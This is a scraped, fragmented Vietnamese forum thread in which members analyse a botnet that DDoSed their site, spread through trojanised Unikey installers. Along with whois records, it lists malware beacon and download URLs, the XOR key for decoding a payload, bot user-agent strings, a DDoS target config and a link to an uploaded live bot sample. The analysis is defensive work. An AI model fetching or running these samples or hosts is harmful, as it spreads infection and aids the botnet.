mnt-ref:        ONIK-MNT
mnt-by:         ONIK-MNT
changed:        support@netassist.kiev.ua 20091215
source:         RIPE

person:         Zharkov Nikolay
address:        Ukraine, Kyiv, Entuziastov str. 29, of. 42
phone:          +38-044 587-83-16
nic-hdl:        ZN210-RIPE
mnt-by:         ONIK-MNT
changed:        support@netassist.kiev.ua 20081211
source:         RIPE

% Information related to '91.211.116.0/22AS48587'

route:          91.211.116.0/22
descr:          Datacentre "0x2a" Route object
origin:         AS48587
mnt-by:         ONIK-MNT
changed:        pavel@antidot.ua 20081215
source:         RIPE
UA: Ukraina. Không biết có liên quan tới tụi mafia Nga như anh PXMMRF đã nói không ? ]]>
/hvaonline/posts/list/39641.html#244282 /hvaonline/posts/list/39641.html#244282 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244289 /hvaonline/posts/list/39641.html#244289 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. [conmale]$ whois aliasx.net Whois Server Version 2.0 Domain names in the .com and .net domains can now be registered with many different competing registrars. Go to http://www.internic.net for detailed information. Domain Name: ALIASX.NET Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM Whois Server: whois.PublicDomainRegistry.com Referral URL: http://www.PublicDomainRegistry.com Name Server: NS1.SURATIT.IN Name Server: NS2.SURATIT.IN Name Server: NS3.SURATIT.IN Name Server: NS4.SURATIT.IN Status: clientDeleteProhibited Status: clientHold Status: clientTransferProhibited Status: clientUpdateProhibited Updated Date: 25-jul-2011 Creation Date: 08-apr-2011 Expiration Date: 08-apr-2012 >>> Last update of whois database: Wed, 27 Jul 2011 05:50:48 UTC <<< The Registry database contains ONLY .COM, .NET, .EDU domains and Registrars. Registration Service Provided By: SH3LLS Contact: +852.58080443 Website: http://www.sh3lls.net/ Domain Name: ALIASX.NET Registrant: PrivacyProtect.org Domain Admin (contact@privacyprotect.org) ID#10760, PO Box 16 Note - All Postal Mails Rejected, visit Privacyprotect.org Nobby Beach null,QLD 4218 AU Tel. +45.36946676 Creation Date: 08-Apr-2011 Expiration Date: 08-Apr-2012 Domain servers in listed order: ns1.suratit.in ns2.suratit.in ns3.suratit.in ns4.suratit.in Administrative Contact: PrivacyProtect.org Domain Admin (contact@privacyprotect.org) ID#10760, PO Box 16 Note - All Postal Mails Rejected, visit Privacyprotect.org Nobby Beach null,QLD 4218 AU Tel. +45.36946676 Technical Contact: PrivacyProtect.org Domain Admin (contact@privacyprotect.org) ID#10760, PO Box 16 Note - All Postal Mails Rejected, visit Privacyprotect.org Nobby Beach null,QLD 4218 AU Tel. +45.36946676 Billing Contact: PrivacyProtect.org Domain Admin (contact@privacyprotect.org) ID#10760, PO Box 16 Note - All Postal Mails Rejected, visit Privacyprotect.org Nobby Beach null,QLD 4218 AU Tel. +45.36946676 Status:SUSPENDED 
Hiện nay đám hosting iWeb và đám domain registrar "SH3LLS" này vẫn còn host một số "kho tàng" của STL. Đám này hết chơi OnlineNIC ở Hồng Kông rồi đến sh3lls cũng ở Hồng Kông, toàn là những nơi tàng chứa những domain frauds. Còn hosting thì kiếm mấy chỗ chai lì để chứa những thứ độc hại. Có lẽ STL nghĩ rằng chuyển sang núp bóng ở Hồng Kông thì tụi FBI không mó tay vô được chắc :-) . ]]>
/hvaonline/posts/list/39641.html#244290 /hvaonline/posts/list/39641.html#244290 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244292 /hvaonline/posts/list/39641.html#244292 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Host express.blogdns.info có IP là: 91.211.118.119, vẫn còn sống nhăn răn, nhưng giờ này thì không mở port nào. Vì vậy nên advertise.gif em lấy về không được. IPNetInfo cho ra thông tin sau: Code:
inetnum:         91.211.116.0 - 91.211.119.255
netname:         net-0x2a
descr:           Zharkov Mukola Mukolayovuch
remarks:         Datacentre "0x2a"
country:         UA
org:             ORG-PEZM1-RIPE
admin-c:         ZN210-RIPE
tech-c:          ZN210-RIPE
status:          ASSIGNED PI
mnt-by:          RIPE-NCC-END-MNT
mnt-lower:       RIPE-NCC-END-MNT
mnt-by:          ONIK-MNT
mnt-routes:      ONIK-MNT
mnt-domains:     ONIK-MNT
changed:         support@netassist.kiev.ua 20081211
source:          RIPE

organisation:   ORG-PEZM1-RIPE
org-name:       Private Entreprise Zharkov Mukola Mukolayovuch
org-type:       OTHER
address:        Ukraine, Kyiv, Entuziastov str. 29, of. 42
e-mail:         support@0x2a.com.ua
admin-c:        ZN210-RIPE
phone:          +38-044 587-83-16
mnt-ref:        ONIK-MNT
mnt-by:         ONIK-MNT
changed:        support@netassist.kiev.ua 20091215
source:         RIPE

person:         Zharkov Nikolay
address:        Ukraine, Kyiv, Entuziastov str. 29, of. 42
phone:          +38-044 587-83-16
nic-hdl:        ZN210-RIPE
mnt-by:         ONIK-MNT
changed:        support@netassist.kiev.ua 20081211
source:         RIPE

% Information related to '91.211.116.0/22AS48587'

route:          91.211.116.0/22
descr:          Datacentre "0x2a" Route object
origin:         AS48587
mnt-by:         ONIK-MNT
changed:        pavel@antidot.ua 20081215
source:         RIPE
UA: Ukraina. Không biết có liên quan tới tụi mafia Nga như anh PXMMRF đã nói không ?  
Anh nghĩ không phải mafia Nga gì đâu mà STL cũng có servers bên Ukraine (có lẽ nghĩ rằng host bên Ukraine thì tụi FBI không mó tay vô được :-) ). Chuỗi 91.211.116.0/22 kia cũng chứa trang "tuyệt tác" x-cafevn-db.info trước kia.]]>
/hvaonline/posts/list/39641.html#244296 /hvaonline/posts/list/39641.html#244296 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244298 /hvaonline/posts/list/39641.html#244298 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

lequi wrote:
@TQN: Trong mớ packet em capture thì cũng thấy URL này, và của e là đây: http://fastupdate.dyndns-office.com/advertise.gif?cv=1&uv=1&uc=0&lrp=4&sye=0&v=0&id=08vWdU7mjkAqVg5oiy7O799iqUzTK46n&als=6D21494831435D&cn=LEQUY-PC&us=LeQuy&qmnhnqzdptpgwfkfkn=prplnfiydcrrmmshaxmypr 
fastupdate.dyndns-office.com resolved về "204.13.248.126" và IP này nằm trong blacklist của nhiều database vì nổi tiếng malware. Nó bị "đóng cửa" từ hồi 2010. IP này trỏ tới hơn 500 hostname, toàn là những thứ "đầu trâu mặt ngựa" của Internet. Không biết phải có liên quan tới STL không.]]>
/hvaonline/posts/list/39641.html#244299 /hvaonline/posts/list/39641.html#244299 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. Code:
1. http://express.blogdns.info/advertise.gif?cv=1&uv=1&uc=0&lrp=0&sye=0&v=0&id=JF5RfuJw4q8Tbgri83V3FgetMfHLT24p&als=6D21494831435D&cn=abcde&us=abc

2. http://fastupdate.dyndns-office.com/advertise.gif?cv=1&uv=1&uc=0&lrp=0&sye=0&v=0&id=JF5RfuJw4q8Tbgri83V3FgetMfHLT24p&als=6D21494831435D&cn=abcde&us=abc

3. http://hot.enfaqs.com/advertise.gif?cv=1&uv=1&uc=0&lrp=0&sye=0&v=0&id=JF5RfuJw4q8Tbgri83V3FgetMfHLT24p&als=6D21494831435D&cn=abcde&us=abc

4. http://securelogin.doomdns.com/advertise.gif?cv=1&uv=1&uc=0&lrp=0&sye=0&v=0&id=JF5RfuJw4q8Tbgri83V3FgetMfHLT24p&als=6D21494831435D&cn=abc&us=abc
Cảm ơn lequy, cậu không nói thì chắc tui đã không biết và bỏ sót. Trong 4 cái host trên, cái thì chết, cái thì đóng port 80. Chỉ còn một mình thằng fastupdate.dyndns-office.com là còn respond cho lệnh download, và nó chỉ trả về cho em cái này:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html><head><title>fastupdate.dyndns-office.com is offline</title></head> <body><h1>fastupdate.dyndns-office.com is offline</h1><hr> <p>fastupdate.dyndns-office.com is currently offline. Please try again later.</p> </body></html>  
Buồn thiệt, không thì anh em ta có được con bot mới nữa rồi. Thôi, nhiệm vụ kế tiếp là up các mẫu MsHelpCenter còn rin extract từ "Unikey độc" (theo anh PXMMRF) của asaxin và BackupUtility lên KIS, MS, Avira...]]>
/hvaonline/posts/list/39641.html#244302 /hvaonline/posts/list/39641.html#244302 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale wrote:

PXMMRF wrote:
Ở Việt nam hiện nay, theo tôi, chỉ khoảng 5-8 % người cài win 7, còn lại hầu hết là Win XP. Trong số người cài Win 7, có lẽ tối đa là 30-40% người có thể nhiễm STL trojan thôi. Như thế khó mà tạo lập được mang STL bot với hàng trăm ngàn máy ở VN.  
Hì hì, câu này anh Mai nói ngược rồi. Bởi vì hầu hết dùng Windows XP và chỉ có 5-8% dùng Windows 7 (trong số người dùng Windows 7 thỉ chỉ có 30-40% bị nhiễm) cho nên dễ tạo lập được mạng STL bot với hàng trăm ngàn máy ở VN. Sau kết quả điều tra sơ khởi, em thấy cả hệ thống máy của một trường đại học đều ấn định người dùng có chủ quyền "Administrator" và hàng chục doanh nghiệp lớn/vừa cũng không tránh khỏi lỗ hổng này. Trong con số 20 người dùng máy bình mà em hỏi thăm thì 100% là chạy dưới chủ quyền "Administrator". Bởi vậy, dễ tạo lập được mạng STL bot với hàng trăm ngàn máy ở VN chớ không phải "khó" :P . 
Hì hì, câu này mình nói với ý khác. Vì axasin thông báo là cài cái Malicious Unikey mà bạn ấy download về chỉ tạo các file virus MSHelpCenter.* trong Windows 7 thôi , còn trong Win XP thì không được (nghĩa là Win XP thì không bị nhiễm virus khi cài malicious Unikey nói trên). Vì số người ở VN dùng Win 7 còn ít, nên tôi suy diễn tiếp theo ý axasin như vậy (cũng có ý rỡn vui với rang0 chút chút) Đây là suy diễn theo nhận định của axasin. Chứ tôi đương nhiên là không nghĩ như vậy. Tôi nghĩ máy trên mạng VN hầu hết là cài Win XP và tỷ lệ máy cài Win XP bị nhiễm STL virus-trojan là rất cao. Cần nói thêm là hiện đang có nhiều loại (version) malicious Unikey và Vietkey trên mạng. Malicious Unikey mà axasin cài khác với của lequi đã cài. Còn có nhiều malicious Unikey khác trên mang nũa. Kinh! [Hì hì các bác đừng gọi là "fake Unikey", vì nó vẫn dùng được để đánh chữ Việt mà. Nên gọi là malicious Unikey (Unikey độc). Giả thì không dùng đươc. Nhưng Unikey nhiễm độc (malicious) thì vẫn dùng được, nhưng lai nguy hiểm cho ta hơn ngàn lần. Hì hì. Nhưng đây chỉ là khuyến cáo vui thôi!] Đúng là hầu hết máy tính cá nhân ở Việt nam (tai tư gia, cơ quan) đều cài đặt cho user dưới quyến admin.. Win XP rõ ràng là cũng hỗ trợ việc này thưc hiện dễ dàng trong quá trình cài đặt nó. Việc phân quyên cho user trên Win XP còn đơn giản và thiếu bảo mật hơn Win 2000. Nhưng nghĩ lai thì lại thấy khó: máy riêng của nó, hay phân cho mình nó dùng tại cơ quan, thì hà cớ gì bắt nó chỉ đươc dùng account restricted hay account limited. Khó thật. Chuyên vui (có thưc): Vừa qua công ty tôi các máy tính bị nhiễm virus nặng nề, lây lan lung tung, mất dữ liêu, do anh em có quyền admin. tự động cài nhiều chương trình game, nghe nhạc nhiễm virus. Tôi nổi điên lên, yêu cầu tất cả công ty mang máy lên văn phòng để phân quyên lại: không cho dùng quyên admin, chỉ cho dùng quyền restricted hay limited. Gần trăm máy mang lên, xếp hàng, trông hết hồn. Lệnh đã ra phải làm, không kỳ. Tôi và 2 lão Kỹ sư IT phải mất gần 3 ngày để phân quyền, dọn dep rác rưởi, update antivirus và cài lai các máy in, máy scan, nâng cấp RAM.... Mệt quá. Nhưng rõ ràng sau đó tình hình đỡ hơn nhiều. Gần đây lai phải tổ chức 1 lớp hoc sử dung máy tính trong nôi bộ cơ quan..... To "TQN". Ucraina có một mối quan hệ rất sâu sắc với TQ, đăc biệt trong thời kỳ tổng thống cũ, khi mà môi quan hệ giữa Nga và Ukrain xấu, rạn nứt. TQ trơ giúp Ucrain rất nhiều về Ktế và đầu tư một số vốn khá lơn vào nước này ]]>
/hvaonline/posts/list/39641.html#244305 /hvaonline/posts/list/39641.html#244305 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. khoảng 10 domain STL sử dung cho 10 master website-webserver khác nhau. Một số website-webserver đã tạm thời ngưng hoăc mất domain. Vấn đề chúng ta chưa xác định thật rõ là website-webserver nào đang in-charge (đang làm nhiệm vụ DDoS), như đang DDoS vào HVA chẳng hạn, cái nào đã thôi dùng.? Chúng ta cũng chưa phân tích và tổng hơp các thông tin về nguồn (website, webserver) mà STL hay người khác (bị STL lơi dung) dùng để phát tán virus, thí dụ http://nethoabinh.com/ mà lequi đã xác nhận. Về virus-trojan chúng ta cũng còn chưa rõ là ngoài nhóm file MShelpcenter.*... tạo ra từ malicious Unikey mà lequi download về từ đường dẫn của http://nethoabinh.com/, có còn có các nhóm file loại khác, tên khác nhưng công dung tương tự không?. MShelpcenter.* files có là những file mới nhất của STL không.? STL cũng nhúng virus-Trojan vào các file Vietkey (2000-2002-2007) đang được upload rất nhiêu trên mạng. Chúng đươc STL nhúng vào các virus-trojan loai gì, có giống như ở Unikey không? Còn phải kể những file Adobe flash Player dễ dàng download trên mạng, cũng thường bị STL nhúng virus-trojan vào. Rõ ràng đang còn rất nhiều vấn đề cần phải nghiên cứu, tìm hiểu và giải quyết. ]]> /hvaonline/posts/list/39641.html#244310 /hvaonline/posts/list/39641.html#244310 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244312 /hvaonline/posts/list/39641.html#244312 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. Code:
URL1: http://speed.cyline.org:443/flower.bmp?g={1CD70F27-EA66-4812-834C-FB39AE2DC170}&c=1&v=1&tf=312218282815&tr=312218282861&t=312218282864&p=2&e=0&n=ThangChaMayTuiSTL&u=OngNoiMayNe&lfhbbnwdbywxlineyegfswjxylrktvvfjqlr=vznmbfhxpgocvojqhosgdbenhrjtnglagonsvca
URL2: http://speed.cyline.org:443/BlueSphere.bmp?dl=1&oyeerpsaahqumkthxeswvwlfdxpizmffsfk=njhkmdjqlnkwmrofymzmxgqf
]]>
/hvaonline/posts/list/39641.html#244314 /hvaonline/posts/list/39641.html#244314 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. http://code.google.com/p/vietnam-unikey/downloads/detail?name=Uk40RC1ntSetup.exe&can=2&q= - sourceforge: http://en.sourceforge.jp/projects/sfnet_unikey/downloads/unikey-win/4.0%20RC1/Uk40RC1ntSetup.exe/) đều y như nhau và đều là malware.. Bản trên code.google.com được upload ngày 17 tháng 3 năm 2010. Bản trên sourceforge được upload ngày 19 tháng 4 năm 2006. Cả ba bản trên có y hệt checksum và nội dung y hêt nhau. Chỉ còn 1 cách là gởi thông tin đến tất cả các cty antivirus. ]]> /hvaonline/posts/list/39641.html#244318 /hvaonline/posts/list/39641.html#244318 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale wrote:
- sourceforge: http://en.sourceforge.jp/projects/sfnet_unikey/downloads/unikey-win/4.0%20RC1/Uk40RC1ntSetup.exe/)  
Em vừa down thử từ nguồn này về, thấy nó sạch mà anh !?]]>
/hvaonline/posts/list/39641.html#244319 /hvaonline/posts/list/39641.html#244319 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

acoustics89 wrote:
Bận quá, giờ mới mò vào xem được, topic tăng nhanh quá. Hay bây giờ thành lập 1 đội đi ạ, phân công ai phân tích cái gì. Chứ bây giờ ví dụ như em tải cái bộ Backup của bạn Lequi về phân tích cũng mất công, vì đa số anh em khác làm rồi. nhưng kể ra làm 1 đội cũng khó, vì đa phần anh em dùng thời gian rảnh để làm, có người bận lúc này lúc khác Các anh có ý kiến gì để làm việc hiệu quả hơn không 
Anh nghĩ có 3 mảng để lo: 1. RE. 2. Trace net và xác định mạng hoạt động của malware. 3. Report cho các nhóm antiviruses và các nhóm chức năng. Nếu cần làm việc hữu hiệu có lẽ cần phải tạo một group list (dùng google group chẳng hạn). Trong đó, thành viên của nhóm liên lạc qua group và chỉ nên công bố thông tin trên diễn đàn sau khi tìm ra kết quả hoặc nếu cần các thành viên trên diễn đàn đóng góp thêm thông tin, mẫu mã.]]>
/hvaonline/posts/list/39641.html#244320 /hvaonline/posts/list/39641.html#244320 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale wrote:
Tớ vừa thử nghiệm thì 3 copies khác nhau của unikey download từ - sourceforge: http://en.sourceforge.jp/projects/sfnet_unikey/downloads/unikey-win/4.0%20RC1/Uk40RC1ntSetup.exe/) đều y như nhau và đều là malware.. Bản trên code.google.com được upload ngày 17 tháng 3 năm 2010. Bản trên sourceforge được upload ngày 19 tháng 4 năm 2006. Cả ba bản trên có y hệt checksum và nội dung y hêt nhau. Chỉ còn 1 cách là gởi thông tin đến tất cả các cty antivirus.  
Thằng này em chạy cũng sạch luôn, ko thấy sinh ra mấy cái folder với file .exe nào cả]]>
/hvaonline/posts/list/39641.html#244321 /hvaonline/posts/list/39641.html#244321 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

rang0 wrote:

conmale wrote:
- sourceforge: http://en.sourceforge.jp/projects/sfnet_unikey/downloads/unikey-win/4.0%20RC1/Uk40RC1ntSetup.exe/)  
Em vừa down thử từ nguồn này về, thấy nó sạch mà anh !? 
Lạ vậy? Anh download từ nguồn sourceforge ở trên, cái binary y hệt như từ trang nethoabinh.com. Không lẽ anh download bản bị cached ở đâu đó chớ không phải bản chính thức từ sourceforge?]]>
/hvaonline/posts/list/39641.html#244322 /hvaonline/posts/list/39641.html#244322 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. http://fastupdate.dyndns-office.com/ Emm có vào site này có thông báo Code:
fastupdate.dyndns-office.com is offline

fastupdate.dyndns-office.com is currently offline. Please try again later.
Theo em host này đã đc cấu hình, nếu không đúng User-Agent nó sẽ wwwect sang cái thông báo trên Còn cái thông báo đó chỉ để "lừa tình" mọi người thôi, mọi người sẽ nghĩ nó offline thật, vì theo em biết dyndns không hỗ trợ những thông báo như vậy]]>
/hvaonline/posts/list/39641.html#244323 /hvaonline/posts/list/39641.html#244323 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. http://fastupdate.dyndns-office.com/ nó ra cái này Code:
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.k9activewear.com/request.php?remote_socket=tcp://xxxxxxxxxxx">here</a>.</p>
<hr>
<address>Apache/2.2.3 (CentOS) Server at 216.55.166.13 Port 80</address>
</body></html>
Check cái http://www.k9activewear.com Code:
Registrar: GODADDY.COM, INC.
Whois Server: whois.godaddy.com
Referral URL: http://registrar.godaddy.com
Status: clientDeleteProhibited, clientRenewProhibited, clientTransferProhibited, clientUpdateProhibited

Expiration Date: 2012-07-04
Creation Date: 2011-07-04
Last Update Date: 2011-07-04

Name Servers:
    ns77.domaincontrol.com
    ns78.domaincontrol.com
See k9activewear.com DNS Records

Information Updated: Wed, 27 Jul 2011 10:47:41 UTC
Creation Date: 2011-07-04 <-- Mới tinh luôn Lại Prohibited hehe mấy anh này nguỵ trang kiểu ÚC rồi]]>
/hvaonline/posts/list/39641.html#244324 /hvaonline/posts/list/39641.html#244324 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244325 /hvaonline/posts/list/39641.html#244325 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244326 /hvaonline/posts/list/39641.html#244326 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244327 /hvaonline/posts/list/39641.html#244327 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

conmale wrote:

acoustics89 wrote:
Bận quá, giờ mới mò vào xem được, topic tăng nhanh quá. Hay bây giờ thành lập 1 đội đi ạ, phân công ai phân tích cái gì. Chứ bây giờ ví dụ như em tải cái bộ Backup của bạn Lequi về phân tích cũng mất công, vì đa số anh em khác làm rồi. nhưng kể ra làm 1 đội cũng khó, vì đa phần anh em dùng thời gian rảnh để làm, có người bận lúc này lúc khác Các anh có ý kiến gì để làm việc hiệu quả hơn không 
Anh nghĩ có 3 mảng để lo: 1. RE. 2. Trace net và xác định mạng hoạt động của malware. 3. Report cho các nhóm antiviruses và các nhóm chức năng. Nếu cần làm việc hữu hiệu có lẽ cần phải tạo một group list (dùng google group chẳng hạn). Trong đó, thành viên của nhóm liên lạc qua group và chỉ nên công bố thông tin trên diễn đàn sau khi tìm ra kết quả hoặc nếu cần các thành viên trên diễn đàn đóng góp thêm thông tin, mẫu mã. 
em cũng vừa nghĩ đến vấn đề này, thà rằng tạo 1 team âm thầm làm việc và chỉ public khi công việc đến mức độ nào đó. em thấy các anh cứ làm việc rồi lại mất ngồi post lên thế này khá mất thời gian :D mà lại đánh rắn động cỏ ...nếu được em xin 1 chân ở trong group nào đó :D Ý kiến của em là nên lập 1 nhóm tuyên truyền .Hướng dẫn kĩ thuật tìm và diệt malware, cho member ở các forum khác. các phần mềm đã bị fake nên có hướng dẫn cụ thể đâu là thật đâu là giả và lấy từ nguồn nào tốt nhất,chắc chắn chúng ta không thể loại hoàn toàn được malware của STL nhưng cũng đỡ đi phần nào, để chúng nó thấy anh em hva cũng biết cách phản công chứ không chỉ ngồi phân tích cái đống code của chúng. Đã đến lúc mọi người chung tay góp sức, làm việc có kế hoạch và bài bản để đạt được kết quả cao nhất :D O-) ]]>
/hvaonline/posts/list/39641.html#244330 /hvaonline/posts/list/39641.html#244330 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. http://analysis.avira.com/samples/details.php?uniqueid=KcAZAjtnOS4VD6kgfsrWYGchX1gq6Lvn&incidentid=791390 Clean sạch hết, mà là Trojan.Downloader 100% đấy. Bó tay. Em cạch, không dám tin tưởng 100% vào các AVs nữa. ]]> /hvaonline/posts/list/39641.html#244332 /hvaonline/posts/list/39641.html#244332 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244337 /hvaonline/posts/list/39641.html#244337 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244338 /hvaonline/posts/list/39641.html#244338 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Em cạch, không dám tin tưởng 100% vào các AVs nữa.  
Em lúc trước mua con lap được khuyến mại bkav pro 3 tháng. Định ko dùng đâu nhưng mà free thì cũng cứ dùng cho đỡ phí(sinh viên mà). Mấy hôm nay nghe thấy vụ này cũng lên down mấy mẫu về xem bkav làm ăn thế nào thế mà nó cũng chén sạch anh ạ :D . Em nghĩ có khi bkav của anh "quảng bomb" cũng đang "âm thầm" theo chân đám mèo què ấy chứ :P]]>
/hvaonline/posts/list/39641.html#244339 /hvaonline/posts/list/39641.html#244339 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Thậm chí như Avira vừa rồi, update đống BackupSvc lên, còn report cho em như sau: http://analysis.avira.com/samples/details.php?uniqueid=KcAZAjtnOS4VD6kgfsrWYGchX1gq6Lvn&incidentid=791390 Clean sạch hết, mà là Trojan.Downloader 100% đấy. Bó tay. Em cạch, không dám tin tưởng 100% vào các AVs nữa.  
Em nhìn cái link của anh mà em buồn cười quá =)) =)) Cười như điên lúc nửa đêm. Như em nói đó, công nghệ tạo ra malware đang đi trước chúng ta, và các hãng AV. Các hãng cứ quảng cáo mình lắm tài, nhiều công nghệ tiên tiến nhưng mà đấy, submit mẫu cho thì lai bảo clean. Đến cả AV cài trên máy, hook kinh hoàng, driver đủ kiểu, Chữ kí chữ cọt, Emulator, Heuristic, điện toán đám ma... mà có ăn thua đâu Nói chung là lởm như nhau thôi, chả cái AV nào tốt, lại còn chậm máy, thi thoảng lại dở chứng . Nhìn log của các bạn như KIS thì nản, dài dòng, tuỳ chọn vô biên nhưng mà để làm gì, vô dụng cả thôi =)) Em quen dùng cái av em thích nhất là VMWare, duyệt web vô tư,download thì toàn từ trang chủ, check kĩ, crack thì toàn RCE ra, xem patch thế nào, thì code lại, keygen cũng thế....Nói chung là an toàn tuyệt đối. Tất nhiên có bác sẽ nói em phải đầu tư RAM với ổ cứng, nhưng mà các bác ạ, dùng AV thì cũng thế thôi, như bạn BIT, sắp lên 1GB database rồi đấy, bạn nào chả chiếm ram, tương đương máy ảo thôi. Trong máy ảo em có cả Microsoft Word nhé -:|- ]]>
/hvaonline/posts/list/39641.html#244341 /hvaonline/posts/list/39641.html#244341 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244342 /hvaonline/posts/list/39641.html#244342 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244345 /hvaonline/posts/list/39641.html#244345 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

ptv_vbhp wrote:

TQN wrote:
Em cạch, không dám tin tưởng 100% vào các AVs nữa.  
Em lúc trước mua con lap được khuyến mại bkav pro 3 tháng. Định ko dùng đâu nhưng mà free thì cũng cứ dùng cho đỡ phí(sinh viên mà). Mấy hôm nay nghe thấy vụ này cũng lên down mấy mẫu về xem bkav làm ăn thế nào thế mà nó cũng chén sạch anh ạ :D . Em nghĩ có khi bkav của anh "quảng bomb" cũng đang "âm thầm" theo chân đám mèo què ấy chứ :P 
Trước khi em cho bkav chén mấy con bọ, em có cập nhật virus def của bkav không hay chỉ dùng bản cũ?]]>
/hvaonline/posts/list/39641.html#244349 /hvaonline/posts/list/39641.html#244349 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244354 /hvaonline/posts/list/39641.html#244354 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

ptv_vbhp wrote:
Bản virus def là gì hả anh ? Em vẫn dùng bản cũ trong đó có mẫu .idx em thấy bị chém lâu lâu rồi hay sao ý ? 
Definition em, nhưng mà phát biểu thì phải cẩn trọng nhé.]]>
/hvaonline/posts/list/39641.html#244359 /hvaonline/posts/list/39641.html#244359 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244361 /hvaonline/posts/list/39641.html#244361 GMT Phân tích tính chất vài trận DDoS HVA vừa qua. Code:
URL1: http://poxxf.com/flash.swf?cpn=ABC
URL2: http://paxds.com/flash.swf?cpn=ABC - Chưa chết, nhưng forbidden.
URL Download AcrobatUpdater.exe: http://poxxf.com/images.gif
User-Agent: Gozilla_2/General
Down images.gif về, xor toàn bộ content với 0x19, ra ông nội bot mới: Code:
File AcrobatUpdater.exe:
Size = 315392 bytes
MD5 = 5EA82DD32A7ECA5FDDAFE7D4A7F5E82D
Debug, trace, capture packet của nó, ra thông tin thằng host mới của STL: Code:
Host: second.dinest.net
IP: 193.106.175.68
User-Agent: An0nym0453
xv.jpg: 2011-07-28 09:46:58
xc.jpg: <targets><item enabled="1" threads="5" delay="5" method="GET" protocol="http" host="www.hvaonline.net" port="80" uri="/" keepCookies="1" crawling="1" referer=""/></targets>
Em lạy bà con, bà con xoá giùm em hết mấy cái MsHelpCenter, BackupSvc, AcrobatUpdater giùm em với. Cảnh báo như vậy mà vẫn không nhúc nhích gì à ? PS: Chỉ sơ ý bỏ qua một host trong MsHelpCenter.exe mà tụi nó nhanh chân dùng host kia liền. MsHelpCenter.exe, BackupSvc.exe mang trong người nó 2-4 địa chỉ host để download file exe bot về. Host này down không được thì nhảy tới host khác. Cái này cũng chính là cái chủ quan của em và accxxx89 (thông cảm, tên khó nhớ quá) File mẫu bot mới up ở: http://www.mediafire.com/?f1xiq71cpfe7ej4]]>
/hvaonline/posts/list/39641.html#244363 /hvaonline/posts/list/39641.html#244363 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. Code:
URL1: http://poxxf.com/flash.swf?cpn=ABC
URL2: http://paxds.com/flash.swf?cpn=ABC
URL Download AcrobatUpdater.exe: http://poxxf.com/images.gif
User-Agent: Gozilla_2/General
Bản cũ: Code:
URL1: http://tongfeirou.dyndns-web.com/banner1.png?cpn=ABC
URL2: http://biouzhen.dyndns-server.com/banner1.png?cpn=ABC
URL3: http://maowoli.dyndns-free.com/banner1.png?cpn=ABC
User-Agent: Gozilla_2/General
]]>
/hvaonline/posts/list/39641.html#244364 /hvaonline/posts/list/39641.html#244364 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. Domain Name: DINEST.NET Registrant: PrivacyProtect.org Domain Admin (contact@privacyprotect.org) ID#10760, PO Box 16 Note - All Postal Mails Rejected, visit Privacyprotect.org Nobby Beach null,QLD 4218 AU Tel. +45.36946676 Creation Date: 27-Jul-2011 Expiration Date: 27-Jul-2012 
Mới cứng. Lần này các bạn STL mò về IQHost của Russia Federation ;). ]]>
/hvaonline/posts/list/39641.html#244366 /hvaonline/posts/list/39641.html#244366 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua. /hvaonline/posts/list/39641.html#244367 /hvaonline/posts/list/39641.html#244367 GMT Phân tích tính chất vài trận DDoS HVA vừa qua.

TQN wrote:
Em lạy bà con, bà con xoá giùm em hết mấy cái MsHelpCenter, BackupSvc, AcrobatUpdater giùm em với. Cảnh báo như vậy mà vẫn không nhúc nhích gì à ?  
Trong này thì anh nghĩ xem liệu có bao nhiêu người chịu theo dõi topic của anh và biết về sự kiện này?]]>
/hvaonline/posts/list/39641.html#244368 /hvaonline/posts/list/39641.html#244368 GMT
Phân tích tính chất vài trận DDoS HVA vừa qua.

template wrote:
